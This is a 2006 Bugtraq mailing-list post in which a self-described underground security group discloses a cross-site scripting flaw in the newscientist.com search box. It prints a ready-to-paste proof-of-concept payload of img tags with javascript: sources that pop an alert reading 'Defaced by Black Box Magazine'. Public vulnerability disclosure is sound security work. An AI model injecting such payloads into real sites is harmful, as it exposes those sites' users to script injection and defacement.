[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

XSS in http://www.newscientist.com/ - Search

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: XSS in http://www.newscientist.com/ - Search
From: viz.security@xxxxxxxxx
Date: 16 Jun 2006 14:13:26 -0000

We from Black Box Magazine - Underground Inet-Security Research -- 
http://bboxnet.mine.nu
found Cross Site Scripting Vuln in http://www.newscientist.com/ 

Write this example in Search:

"><img src=javascript:a=/Defaced%20by%20Black%20Box%20Magazine/><img 
src=javascript:alert(a.source)>

Prev by Date: mp3.com - Cross site scripting vulnerability
Next by Date: MPCS v0.2 - XSS
Previous by thread: mp3.com - Cross site scripting vulnerability
Next by thread: MPCS v0.2 - XSS
Index(es):
- Date
- Thread